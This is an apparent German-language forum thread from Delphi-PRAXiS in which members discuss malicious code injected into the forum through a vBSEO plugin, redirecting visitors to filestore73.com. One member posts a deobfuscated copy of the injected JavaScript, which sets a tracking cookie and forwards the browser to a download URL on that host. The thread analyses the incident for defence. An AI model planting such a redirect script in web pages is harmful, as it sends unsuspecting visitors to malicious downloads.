AW: Fehler in der DP? (FileStore73.com)
Nicht gut...gar nicht gut. Aber Doktor D. macht das schon.
Für diejenigen, die sich nicht vorstellen können, was so garstig daran ist, hier mal ein nicht ganz so trockener Artikel zum Thema: http://www.heise.de/security/artikel...t-1017983.html Sherlock |
AW: Fehler in der DP? (FileStore73.com)
Jein. Panik wäre zuviel des Guten.
Das Problem ist bekannt und vBSEO (der Hersteller der SEO-Erweiterung für vBulletin) und InternetBrands (Hersteller von vBulletin) schieben sich gegenseitig den schwarzen Peter hin und her. Der Code "versteckt" sich in einem Plugin von vBSEO und wenn man dort einen bestimmten Cache neu aufbaut, ist der Code auch erst mal weg. Toll ist das keinesfalls, dennoch ich das Eindringen offenbar auf genau diese eine Stelle beschränkt: Es gab bis heute keine anderen Vorkommen dieses Codes. Ich werde schauen, dass ich eine Script-Lösung entwickle, die den Schadcode erkennt und dann bei Bedarf löscht. |
AW: Fehler in der DP? (FileStore73.com)
Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde? |
AW: Fehler in der DP? (FileStore73.com)
Vielleicht bevor der entsprechende Download gelöscht wurde.
|
AW: Fehler in der DP? (FileStore73.com)
Zitat:
Liebe Grüße, Valle |
AW: Fehler in der DP? (FileStore73.com)
Sowas mache ich generell nicht :D
Danke für die Antworten! |
AW: Fehler in der DP? (FileStore73.com)
Ich habe mir eben mal die Mühe gemacht und den JavaScript-Source "etwas" umgeschrieben. Weiß nicht, ob alles so stimmt:
Code:
Jedenfalls speichert das Script ein Cookie mit dem Namen "vbsp", der nach einem Tag abläuft. Vielleicht sollte man den lieber im Browser löschen.
var consts = ["getTime", "setTime", "; expires=", "toGMTString", "cookie", "=", "; path=/", "vbsp", "1", "location", "http://filestore73.com/download.php?id="];
function ipbcc(arg0, arg1) { // new Date var newDate = new Date; // newDate["setTime"](newDate["getTime"]() + 86400000); newDate[consts[1]](newDate[consts[0]]() + 86400000); // newVar = "; expires=" + newDate["toGMTString"](); var newVar = consts[2] + newDate[consts[3]](); // arg0 = "vbsp" // arg1 = "1" // document["cookie"] = "vbsp" + "=" + "1" + newVar + "; path=/"; document[consts[4]] = arg0 + consts[5] + arg1 + newVar + consts[6]; } // ipbcc("vbsp", "1"); ipbcc(consts[7], consts[8]); // document["location"] = http://filestore73.com/download.php?id=" + vbsp document[consts[9]] = consts[10] + vbsp; Gruß |
AW: Fehler in der DP? (FileStore73.com)
Zitat:
Edit:// Quelle zu Daniels Aussage. Liebe Grüße, Valle |
AW: Fehler in der DP? (FileStore73.com)
Ich würde gerne Valle korrigieren und Blackfin verunsichern ;)
In diesem konkreten Fall scheint nix schlimmes zu passieren. Aber wenn man sich doch mal den von mir geposteten Link zu Gemüte führt, erkennt man, daß eben nicht eine EXE geladen werden muss, deren Start eine Bestätigung des Anwenders erfordert. Man geht heutzutage anders vor (schließlich will man ja die Nerven der Vista-User schonen). Sherlock |
AW: Fehler in der DP? (FileStore73.com)
:shock::shock:
Mhm, aber der Link gilt ja für den Internet Exploder, und wer surft schon damit (Hoëcker, sie sind raus!) |
Alle Zeitangaben in WEZ +1. Es ist jetzt 21:18 Uhr. |
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz